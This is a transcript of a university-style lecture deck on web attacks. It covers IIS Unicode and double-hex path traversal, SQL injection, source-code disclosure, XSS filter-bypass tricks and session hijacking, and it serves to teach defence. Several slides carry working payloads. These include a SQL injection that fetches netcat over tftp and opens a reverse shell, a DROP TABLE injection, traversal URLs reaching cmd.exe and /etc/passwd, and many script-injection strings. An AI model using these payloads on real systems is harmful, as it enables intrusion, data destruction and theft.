network security part ii: attacks network security part ii: attacks web attacks

141
Network Security Network Security Part II: Attacks Part II: Attacks Web Attacks Web Attacks

Upload: cuthbert-charles

Post on 26-Dec-2015

264 views

Category:

Documents


6 download

TRANSCRIPT

Page 1: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Network SecurityNetwork SecurityPart II: AttacksPart II: Attacks

Web AttacksWeb Attacks

Page 2: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Overview

• Web Architecture• Web Hack Attacks

Page 3: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Web ArchitectureWeb Architecture

• Web applications are important and this importance is accelerating

• Web applications are complex and this complexity is accelerating

Page 4: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

This is Not NewThis is Not New•Problems with web applications are the

same problems with standalone applications

Page 5: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Why Target the WebWhy Target the Web

• Everyone is using it• Safe bet the protocol will not become

obsolete anytime soon• New technology is being implemented/

retrofitted on top (e.g. SOAP, WebDAV)• It’s everywhere! Mobile phones, cars,

watches, toasters…• Protocol fundamentally not suited to do

a majority of what it’s doing today

Page 6: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

The Trouble with HTTPThe Trouble with HTTP

• Multitude of involved technologies• The involved protocols are extremely

simple; therefore, it is easy to (mis)code services on your own HTTP server

• Lack of experience coding public service type, multi-user applications

• Stateless nature makes transaction based systems tricky

Page 7: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

How Did We Get Here?How Did We Get Here?

• Unskilled/robotic programmers (“code mills”)

• Lack of security-oriented programming training

• Tendency to ‘code now, fix later’• Current tools make it very easy to code

insecurely• Misconceptions about what ‘security’

really involves

Page 8: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Trouble Prone Areas of Trouble Prone Areas of the Webthe Web

• Buffer overflows– Classic bug that’s been exploited for quite a

while– Lack of bounds-checking in the language a

majority of web applications are written in combined with poor programming practice

– Can exist in the web server, application server, database server, or the CGI programs

– Fortunately it’s a well-advertised problem– Many scripting languages (ASP, PHP,

Perl, .NET, etc) are generally immune, as they have auto-expanding elements

Page 9: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Trouble Prone Areas of Trouble Prone Areas of the Webthe Web

• Cross-site scripting– Reprinting user data without filtering it for

web-specific characters– Potential to trick users into executing java

script in vulnerable site’s context– Partly a ‘social engineering’ technique– More of a liability than a vulnerability—it’s a

way to hack the users, not the server

Page 10: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Trouble Prone Areas of Trouble Prone Areas of the Webthe Web

• SQL tampering– Web server already has/allows access to the

database server– Attacker can cause arbitrary SQL to be executed– Results vary from data exposure to full system

compromise– Does not require direct database access!– Many applications are vulnerable– Stems from CGIs/scripts making assumptions

about user input and not double checking/filtering

Page 11: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Trouble Prone Areas of Trouble Prone Areas of the Webthe Web

• File includes– It’s common for a CGI to open and display or

manipulate the contents of a file on the server

– If the filename is composed of user-supplied elements, an attacker may be able to trick the server into opening another file

– Can lead to info disclosure or script or command execution

Page 12: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Trouble Prone Areas of Trouble Prone Areas of the Webthe Web

• Authentication weaknesses– CGIs can fail to check credentials with every

request– Thus you bypass the login script and directly

access the following scripts, without needing username/password

– Or, certain actions/functions may not check for the proper authentication

Page 13: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Trouble Prone Areas of Trouble Prone Areas of the Webthe Web

• Weak session mechanism– The session/state mechanism uses

predictable token IDs– Or, the ID keyspace is too small for the

number of users– Either way, an attacker can ‘guess’ a valid

token and hijack the session

Page 14: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Mid Range E-Commerce Mid Range E-Commerce Roll-OutRoll-Out

• Web Server• Application Server• Database Server• … and a Firewall• Maybe some options…

– Load Balancer– Reverse Proxy servers– Cache systems

Page 15: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Typical Web Application Typical Web Application Set-UpSet-Up

WebServer

DB

DB

Web app

WebClient Web app

Web app

Web app

HTTPrequest

(cleartext or SSL)

HTTP reply(HTML,

Javascript, VBscript,

etc)

Plugins:•Perl•C/C++•JSP, etc

Database connection:•ADO,•ODBC, etc.

SQL Database

•Apache•IIS•Netscape etc…

Firewall

Page 16: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Traditional HackingTraditional Hacking

• Targeted against vulnerabilities in OS components and Network services.– Buffer overflows

• Not portable; attacks specific to operating system architecture, authentication, services, etc.

• Myriad of exploits for different services, OS platforms, CPU architectures, etc.

Page 17: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Traditional HackingTraditional Hacking

• Requires specialized coding skills such as writing shell-code for buffer-overflows, etc.

• In short, it is a complex activity with a limited practitioner base.

...winsock_found:

xor eax, eaxpush eaxinc eaxpush eaxinc eaxpush eaxcall socketcmp eax, -1jnz socket_ok

push sockerrlpush offset sockerrcall write_consolejmp quit2

socket_ok:mov sock, eaxmov sin.sin_family, 2mov esi, offset _port

...

Page 18: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Limitations of Limitations of Traditional Hacking…Traditional Hacking…

• Modern network architectures are getting more robust and secure.

• Firewalls being used in almost all network roll-outs.

• OS vendors learning from past mistakes (?) and coming out with patches rapidly.

• Increased maturity in coding practices.

Page 19: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Utility of FirewallsUtility of Firewalls

WebServer

DB

DB

Web app

Web app

Web app

Web app

SQL Database

Firewall

wu-ftpdSun RPC

NT ipc$XXX

Hacks on OS Hacks on OS network network services services

prevented by prevented by firewallsfirewalls

Limits Traditional hacking

Page 20: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Utility of FirewallsUtility of Firewalls

WebServer

Web app

DB

DB

Web app

Web app

Web app

SQL Database

Firewall

X

Internal back-end application servers are on a non-routable IP network.

(Private Addresses)

Page 21: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Utility of FirewallsUtility of Firewalls

WebServer

Web app

DB

DB

Web app

Web app

Web app

SQL Database

Firewall

XOutbound access

restricted. Why would a web server telnet

out?

Page 22: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Futility of FirewallsFutility of Firewalls

• Web traffic is the most commonly allowed of any of the protocols through enterprise firewalls.

• HTTP is perceived as friendly traffic• Why lay siege to the wall when you have

a open door.• Attacks that based on

Content/Applications applications are still viewed by some as rare.

Page 23: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Tools Required for Web Tools Required for Web HackingHacking

• A web browser• An Internet connection• ….a clear mind and some spare time!

Page 24: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

A Classification of Web A Classification of Web HacksHacks

• Web attacks fall under the following general categories:– Buffer overflow attacks– SQL injection attacks– Input validation attacks– URL interpretation attacks– Impersonation attacks

Page 25: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Firewalls Cannot Firewalls Cannot Prevent…Prevent…

WebServer

WebClient

Web server misconfiguration

Firewall

• Complexity Complexity mismanagementmismanagement

• IndifferenceIndifference

Page 26: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Attack the ArchitectureAttack the Architecture

Java Runtime

WebServer

htmlhandler

html

jsp

text/htmlheader

/bin/sh

includefile

shtml

text/htmlheader

ProcessSSI tags

#exec#include

script/execu--table

ProcessJSP tags

JavaCompiler

class

shtmlhandler

jsphandler

defaulthandler

cgihandler

text/htmlheader

cgish,perl,…

??

Page 27: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Web Server Architecture Web Server Architecture AttacksAttacks

• Complex web server architectures are can lead to implementation vulnerabilities.

• A common attack is to bypass the web server configuration directives, and invoke the built-in procedures directly.

• A close look at the web server architecture can reveal security problems.

Page 28: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Architecture Architecture MisconfigurationsMisconfigurations

• Handler Forcing:– Certain mis-configurations allow handlers to

be forced onto files that are not supposed to be processed by them.

– Forcing a default handler onto a CGI file can cause the contents of the CGI file to be returned “as-is”.

• Forcing a JSP handler onto an HTML file can cause the contents of the HTML file to be compiled by the Java compiler and executed by the Java run-time machine

Page 29: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

JSP Handler ForcingJSP Handler Forcing

WebServer

ProcessJSP tags

JavaCompiler

class

jsphandler

htmlhandler

htmltext/htmlheader

JSP PageCompile

handler forced on to html files

Java Runtime

Page 30: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Firewalls Cannot Firewalls Cannot Prevent…Prevent…

WebServer

WebClient

Poor checking of user inputs

Web app

Web app

Web app

Web app

URLInterpretation attacks

Firewall

• Input validation attacks

Page 31: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

URL Interpretation URL Interpretation AttacksAttacks

• Several well known vulnerabilities in Windows NT and Internet Information Services dating from Autumn 2000, have been wrapped into a common definition: "The Unicode Bug."

• URL Parsing vulnerability.• Improper handling of illegal Unicode sequences.• Allows remote users to execute arbitrary

commands on the web server under the context of IUSR.

• Can lead to potential Administrator level access.

Page 32: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

The IIS Unicode BugThe IIS Unicode Bug

• Exploit:http://10.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

– attacker could view a directory listing of a server's C:\ drive

• %c0%af = “/”• Can use HTTP POST to send

multiple commands at a time to cmd.exe.

Page 33: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Web Hacking for Collateral Web Hacking for Collateral DamageDamage

• Web hacking can result in three types of collateral damage.

1. Information disclosure (paths etc.)• Arbitrary file content and source code leakage

2. Data disclosure (i.e. return all rows)3. Arbitrary command execution

Page 34: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Source Code DisclosureSource Code Disclosure

"Use the Source, Luke!“

• WebLogic / WebSphere “JSP” bug1. • Ability to retrieve source code of

JSP/JHTML files.• Using uppercase “JSP” in the URL causes

the server to return unparsed JSP code.

1. Discovered by Shreeraj Shah, Foundstone.

Page 35: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

A Classic Case of “Handler A Classic Case of “Handler Mismatch." Mismatch."

Java Runtime

index.jspProcessJSP tags

JavaCompiler

jsphandler

defaulthandler

index.JSP = index.jsp

htmlhandler

shtmlhandler

jhtmlhandler

weblogic.httpd.register.file=weblogic.servlet.FileServlet

weblogic.httpd.register.*.shtml=weblogic.servlet.ServerSideIncludeServlet

weblogic.httpd.register.*.jhtml=weblogic.servlet.jhtmlc.PageCompileServlet

weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet

HTTP Request:index.JSP

Web

Logi

c S

erve

r

XX

Page 36: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

More Source DisclosureMore Source Disclosure

• URL prefixes for source code disclosure1:/servlet/file/ (IBM WebSphere)/file/ (BEA WebLogic)/*.shtml/ (BEA WebLogic)/ConsoleHelp/ (BEA WebLogic)/servlet/com.sun.server.http.servlet.FileServlet/

(Sun JavaWebServer)

1 Advisories located on: http://www.foundstone.com/advisories.htm

Page 37: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

……I Thought it was I Thought it was FunctionalityFunctionality

• IIS “+.htr” bug.– View source code of ASP/ASA files.– URL interpretation vulnerability.

http://10.0.0.1/global.asa+.htr

– “.htr” causes ISM.DLL to handle the URL.– Characters after the “+” sign (space) are

ignored.

Page 38: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Doom on You….Doom on You….

<SCRIPT LANGUAGE="VBScript" RUNAT="Server">Sub Application_OnStart   Set Db = Server.CreateObject("Commerce.DbServer")   Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c"   Db.Application = "http://10.1.1.16/"   Set Application("Db")   = DbEnd SubSub Session_OnStart   '==Visual InterDev Generated - DataConnection startspan==   '--Project Data Connection   Session("DataConn_ConnectionString") =   "DSN=CertSrv;DBQ=C:\WINNT2\System32\CertLog\certsrv.mdb;DriverId=25;   FIL=MS Access;MaxBufferSize=512;PageTimeout=5;"   Session("DataConn_ConnectionTimeout") = 15   Session("DataConn_CommandTimeout") = 30   Session("DataConn_RuntimeUserName") = ""   Session("DataConn_RuntimePassword") = ""   '==Visual InterDev Generated - DataConnection endspan==End Sub</SCRIPT>

User ID: sa

Password: n0t4u2c

Page 39: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

More Source DisclosureMore Source Disclosure

• Some applications access files without appropriate checking.

• Input validation vulnerability.• No checking performed for file type or

location.• Filenames can be manipulated via

parameters passed on the URL or as hidden fields.

Page 40: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

NT IIS Showcode ASP NT IIS Showcode ASP VulnerabilityVulnerability

• Active Server Page (ASP) script installed by default on Microsoft's Internet Information Server (IIS) 4.0

• Gives remote users access to view any file on the same volume as the web server that is readable by the web server.

http://www.someserver.com/msadc/Samples/SELECTOR/Showcode

asp?source=/msadc/Samples/../../../../../boot.ini

Page 41: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Firewalls Cannot Firewalls Cannot Prevent…Prevent…

WebServer

DB

DB

Web app

WebClient Web app

Web app

Web app

HTTPrequest

(cleartext or SSL)

Input validation attacks

Extend SQL statements

SQL Database

URL Interpretation attacks

Firewall

• SQL Query Poisoning

Page 42: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

SQL Query PoisoningSQL Query Poisoning

• Poor input validation on parameters passed to SQL queries can be disastrous.

• Return all rows:http://10.0.0.3/showtable.asp?ID=3+OR+1=1

• Resultant query:SELECT * FROM PRODUCT WHERE ID=3 OR 1=1

Page 43: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

SQL Query PoisoningSQL Query Poisoning

• Drop Table:http://10.0.0.3/showtable.asp?ID=3%01DROP+TABLE+PRODUCT

• Resultant query:SELECT * FROM PRODUCT WHERE ID=3 DROP TABLE PRODUCT

Page 44: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

SQL Query PoisoningSQL Query Poisoning

• Remote Command Execution!http://10.0.0.3/showtable.asp? ID=3%01EXEC+master..xp_cmdshell+

‘tftp+-i+10.0.0.13+GET+nc.exe+

%26%26+nc+-e+cmd.exe+10.0.0.11+2000’

• Command executed:tftp -i 10.0.0.13 GET nc.exe &&

nc -e cmd.exe 10.0.0.11 2000

Page 45: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

SQL Remote CommandoSQL Remote Commando

IIS

DBASP

tftpserver

nc.exe

WebBrowser

C:\>_

1

23

listener at port 2001 to receive the connection

tftp server to get nc.exe transferred over to the NT IIS box.

SELECT * FROM PRODUCT WHERE ID=3EXEC master..xp_cmdshell tftp -i 10.0.0.13 GET nc.exe && nc -e cmd.exe 10.0.0.11 2000

Page 46: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Firewalls Cannot Firewalls Cannot Prevent…Prevent…

WebServer

DB

DB

Web app

WebClient Web app

Web app

Web app

Reverse engineering HTTP

cookies

Input validation attacks

SQL query poisoning

SQL Database

URL Interpretation attacks

Firewall

HTTP session hijacking

•Impersonation

Page 47: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Firewalls Cannot Firewalls Cannot Prevent…Prevent…

WebServer

DB

DB

Web app

WebClient Web app

Web app

Web app

HTTPrequest

(cleartext or SSL)

HTTP reply(HTML,

Javascript, VBscript,

etc)

Plugins:•Perl•C/C++•JSP, etc

Database connection:•ADO,•ODBC, etc.

SQL Database

•Apache•IIS•Netscape etc…

Firewall

•Application bugs

Page 48: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

The MDAC AttackThe MDAC Attack• Vulnerability with Microsoft Data Access

Components (msadcs.dll).• MDAC allows remote users to perform

SQL queries without authentication.• Only the DSN needs to be known.• SQL queries can be crafted to execute

arbitrary commands.

Page 49: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

The MDAC AttackThe MDAC AttackClient Server

Internet Explorer

or VB.exe

RDS Data

Control

OBDC Provider

RDS Data

Space

Custom Business Objects

RDS

Data Factory

ASP

(ADO)

Jet Provider Jet

3.5

OBDC

Remote Data Service

URL

HTML

OLE

DB

IIS

Server

msadcs.dll

Page 50: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

The MDAC AttackThe MDAC Attack

• Exploit:

$query="Select * from Customerswhere City='|shell(\"$command\")|'";

$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .$p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}

• Gain Administrator Privileges on NT!

Page 51: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

The MDAC Attack in The MDAC Attack in ActionAction

IIS 4.0

DBmsadcs

dll

tftpserver

nc.exe

mdac.pl(exploit)

C:\>_

1

23

listener at port 2001 to receive the connection

tftp server to get nc.exe transferred over to the NT IIS box.

SELECT * FROM Customers WHERECity = “|shell($command)

Page 52: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

The Effectiveness of Web The Effectiveness of Web HackingHacking

• By default ports 80 and 443 are usually allowed through firewalls. The open door…

• A single URL string is able to be processed by many different components.

• In most cases the only defense is reliance on secure coding.

Page 53: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Missile of DeathMissile of Death

WebServer

DB

DB

Web app

Web app

Web app

Web app

http: // 10.0.0.1 / catalog / display.asp ? pg = 1 & product = 7

Page 54: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Cross Site Scripting, Cross Site Scripting, Why You Should Care.Why You Should Care.

•XSS is not an attack on the server, it is an attack on the users of your application

•So what?– Identity theft– User masquerading – Reputation Risk

Page 55: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Cross Site Scripting Cross Site Scripting (XSS)(XSS)

•Found in 98% of applications•2 main types

– Transient (URL basedPhttp://badapp.com/error.jsp?msg=<SCRIPT>alert("Test");</SCRIPT>

– Sticky – Script placed in a static bit of web content

Page 56: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

XSS continued…XSS continued…

•Transient generally requires user interaction

•What can happen?– Possibilities are only restricted by the client– Cookie theft most common example

•But I filter “<“ and “>”– Jscript entities “&{alert(‘Test')};”

Page 57: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Session HijackingSession Hijacking

•HTTP is stateless so application designers must build a way to track state

•Cookies and URL strings are the most common ways to track state

•Both are easily exploitable

Page 58: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Session Hijacking Session Hijacking Continued…Continued…

•Generally the next thing to occur after XSS

•Examples of common session tracking issues

Page 59: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Parameter TamperingParameter Tampering

•Programmers will store data anywhere!– URL parameters

http://badapp.com/checkout.pl?p=$1.00– Cookies – Cookie:p=$1.00– Hidden fields – not really hidden

Page 60: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Unbound File CallsUnbound File Calls

•Ye Ole’ ../../•Becomes an issue with the display

important information (global.asa)•Most application languages will take

URL’s as file arguments

Page 61: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Do You Know Where Do You Know Where Your Data is?Your Data is?

•Building an exclusionary filter is difficult because your data is all over the place

Page 62: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Data Flow ExampleData Flow Example

Internet

Customer Service

Database

Marketing Database

Database

Orders Database

www.hackme.com

Page 63: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Designing a proper Designing a proper filterfilter

•Make all filters default deny– Don’t try to exclude “bad stuff”

•Requires a good idea where your data is going

•Log all filter violations

Page 64: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Filter Bypassing is a Filter Bypassing is a Technique to Evade Technique to Evade

Detection by Filtering Detection by Filtering Systems.Systems. • Filter Bypassing techniques come in many varieties

when applied to the many facets of web application security.

• The general idea of performing the various techniques described is to successfully bypass security measures designed to prevent certain types/amounts/values of data from being passed into a given system.

• Many of the described techniques can be highly effective when used properly and even become more powerful when used in combination.

Page 65: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Most filter systems are Most filter systems are very simplevery simple

Seven forms of ingenuity:• URL Encoded Strings• Double Hex Encoding• Unicode Encoded String• Long URLs• Case Sensitivity• XSS Filter-Bypass Manipulation• Null Character Injection

Page 66: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

The Hex AdvantageThe Hex Advantage

By URL hex encoding URL strings, it may be possiblecircumvent filter security systems and IDS.

http://foo.com/cgi?file=/etc/passwd

Can become:

http://foo.com/cgi?file=/%2F%65%74%63

%2F%70%61%73%73%77%64

Page 67: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Double Hex EncodingDouble Hex Encoding

• In September 2001, the Nimda worm spread throughout the Internet taking advantage of a Microsoft IIS vulnerability.

• The vulnerability was called an Escaped Character Decoding Vulnerability, which involves double hex encoding of a URL.

• An attacker or automated script would craft a URL so that it contained special hex-encoded sequences to exploit a vulnerability.

• When an un-patched, vulnerable Microsoft IIS server received the encoded URL, one round of hex decoding was performed on the path in the URL.

• IIS then performed a security check on the decoded URL, but afterwards performed a second round of hex decoding.

• This secondary decoding was the source of another Vulnerability.

Page 68: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

IIS Double HexIIS Double Hex

Round 1 Decoding:scripts/..%255c../winntbecomes:scripts/..%5c../winnt(%25 = “%” Character)

Round 2 Decoding:scripts/..%5c../winntbecomes:scripts/..\../winnt

Directory path traversal is now possible using path obfuscation through Double

Hex Encoding.

Page 69: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

The Unicode SlashThe Unicode Slash• In unicode, “%c0%af”, is the equivilent to a

slash (“/”). • Therefore the common URL IIS exploit:

scripts/..%c0%af../winnt

• becomes: scripts/../../winnt

Once again, directory path traversal is now possible using path obfuscation

through Unicode.

Page 70: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Double SlashDouble Slash

•Double Slash using multiple directory slashes in URLs. For example: http://www.foo.com/..//etc//passwd.

•Can be used to move under the radar of IDS systems and still function properly.

Page 71: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

•Many system put limits on how much data a variable can store or a system can handle.

•Often times if these limits are exceeded, the data will still be used, but bypass certain security considerations.

• URL’s such as:http://www.foo.com/cgi?param=filename

• Replaced with: http://www.foo.com/cgi?param=<2K_of_Data>

Long URL’sLong URL’s

Page 72: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Case SensitivityCase Sensitivity

• Case sensitivity may play a roll in many security filtration systems.

• Alternating case on URL parameters may be used to bypass certain restrictions.

http://foo.com/cgi?param=barhttp://foo.com/cgi?param=BaRhttp://foo.com/CGI?param=BAR

Page 73: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Method SwitchingMethod Switching

• Many web applications do not properly perform HTTP Request Method sanity checking.

• Performing Method Switching can be used to bypass IDS, logging features and CGI security mechanisms.

• Most web servers do not log "POST" data and thus forensic analysis is harder to perform.

The Request Method: GET /cgi-bin/some.cgi

can become: POST /cgi-bin/some.cgi

Page 74: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

The Method token indicates the method to be performed on the resource identified by the Request-URI.

HTTP 1.1 MethodsHTTP 1.1 Methods

• OPTIONS• GET• HEAD• POST • PUT• DELETE• TRACE• CONNECT

Page 75: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Using your “HEAD”Using your “HEAD”

• The “HEAD” request method can be used to determine if a particular HTTP resource is accessible without actually downloading the resource data.

Scans and web application attacks can be made to be more effective using this technique.

Page 76: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Null Character InjectionNull Character Injection• Hex encoded null characters

can be used to thwart some security mechanisms.

• This happens because in the “C” programming language, a null character designates the end of a string.

• So If a CGI appending a “.html” to an input parameter:http://foo.com/cgi?file=../../etc/passwd%00

• Will cut off appending “.html”.

Page 77: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Unicode (UTF-8) Unicode (UTF-8) EncodedEncoded

• Unicode is a universal way to represent characters.

• However, unicode can also be used to circumvent security mechanisms by representing information in another fashion.

• Microsoft IIS has had security issues in the past while supporting unicode.

Page 78: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

URL Encoded StringURL Encoded String

• The specification for URLs (RFC 1738, Dec. '94) poses a problem in that it limits the use of allowed characters in URLs to only a limited subset of the US-ASCII character set:

• "...Only alphanumerics [0-9a-zA-Z], the special characters "$_.+!*'()," [not including the quotes - ed], and reserved characters used for their reserved purposes may be used unencoded within a URL."

Page 79: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

XSS Filter-Bypass XSS Filter-Bypass ManipulationManipulation

• This technique is used pass various types of client-side scripting language through implemented security filters.

• The idea is to be able to achieve client-side execution of a client-side script.

• There are several techniques used to perform this attack.

Page 80: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Hammer the FiltersHammer the Filters

•Submit all the raw HTML tags you can find, and then view the output results.

•Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript Event Handler).

•This will show what HTML is allowed, what the changes were, and possible dangerous HTML that can be exploited.

Page 81: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

SRCing the ProtocolSRCing the Protocol

•Using the “javascript” protocol in an HTML source attribute.

<IMG SRC="javascript:js_expression">

<IMG SRC="javascript:alert('test');">

Page 82: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Alternate Protocol Alternate Protocol SRCingSRCing

•Same technique as the previous, however, using the protocol “livescript” and “mocha” will yield the same effect.

<IMG SRC=“livescript:js_expression">

<IMG SRC=“mocha:alert('test');">

Page 83: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Decimal HTML EntitiesDecimal HTML Entities

•Variation on previous techniques, using decimal HTML entities between the protocol characters can be used to bypass filters, yet still execute JavaScript.<IMG SRC=“java&#010;script:js_expression">

•\09 \10 \11 \12 \13 have all been seen to work

Page 84: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Hex HTML EntitiesHex HTML Entities

•Another variation on the previous example, HEX HTML entities may also be used to bypass filter restriction, yet execute JavaScript.<IMG SRC=“java&#X0A;script:js_expression">

Page 85: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Padding HTML EntitiesPadding HTML Entities

•Padding HTML entities with “0’s” may also be used to bypass the filters, yet still execute JavaScript.

<IMG SRC=“java&#000009;script:js_expression">

Page 86: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

STYLE JavaScript TypeSTYLE JavaScript Type•Changing the MIME-TYPE on a “style” tag

may be used to execute JavaScript.

<style TYPE="text/javascript">JS EXPRESSION</style>

<style TYPE="text/javascript">Alert(document.domain);</style>

Page 87: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

STYLE JavaScript X-STYLE JavaScript X-TypeType

•Variation on the previous example, but by using the “application/x-javascript” MIME-TYPE, the filters may be bypassed.

<STYLE TYPE="application/x-javascript">

alert('JavaScript has been Executed');

</STYLE>

Page 88: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

STYLE JavaScript STYLE JavaScript ImportImport

•Using the @import feature in CSS may be used to perform JavaScript protocol SRCing.

<style TYPE="text/css">

@import url(javascript:alert('Javascript is executed'));

</style>

Page 89: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

STYLE URL ImportSTYLE URL Import

•Using the @import feature in CSS can also be used to import JavaScript from another HTTP resource.

<STYLE type=text/css>

@import url(http://www.test.com);

</STYLE>

Page 90: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

LINK Style SheetLINK Style Sheet

•The “LINK” tag can be used to import JavaScript from a remote HTTP resource.

<LINK REL=STYLESHEET TYPE="text/javascript" SRC="javascript_path.js">

Page 91: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Style Left ExpressionStyle Left Expression

•A few CSS features used together to execute JavaScript.

<PSTYLE="left:expression(eval('alert(\'JavaScript is executed\');window.close()'))" >

Page 92: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Remote SRCingRemote SRCing

•A few HTML tags, such as “LAYER”, “ILAYER”, “FRAME”, and “IFRAME” can be used to src in JavaScript from remote resources.

<LAYER SRC="js.html"></LAYER>

<LAYER SRC="js.html"></LAYER>

Page 93: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

……AND CURLYAND CURLY

<IMG SRC="&{javascript_expression};">

<IMG SRC="&{alert(‘alert’)};">

•Syntax must be exact.

Page 94: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Dangerous HTML TagsDangerous HTML Tags

•“All HTML is to be considered dangerous, but these tags are the most insidious.”

– <APPLET>– <BODY>– <EMBED>– <FRAME>– <FRAMESET>– <HTML>– <IFRAME>– <IMG>– <LAYER>– <ILAYER>– <META>– <OBJECT>– <SCRIPT>– <STYLE>

Page 95: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Dangerous HTML Dangerous HTML AttributesAttributes

•(HTML Tags with these attributes.)– SRC– LOWSRC– STYLE– HREF

Page 96: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Web Applications LoginsWeb Applications Logins

Page 97: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Traditional Brute ForceTraditional Brute Force

guest

Admin

123123

Password

Etc.

Page 98: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Session ID OverviewSession ID Overview

•HTTP is stateless protocol•Rather than make a user authenticate

upon each click in a web application, a sense of “state” is created

•In order to maintain state, a shared string, token, or secret between HTTP client and server is usually used by developers

•Essentially, authentication data (username/password) exchanged for “Session ID”

Page 99: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Web State AttacksWeb State Attacks

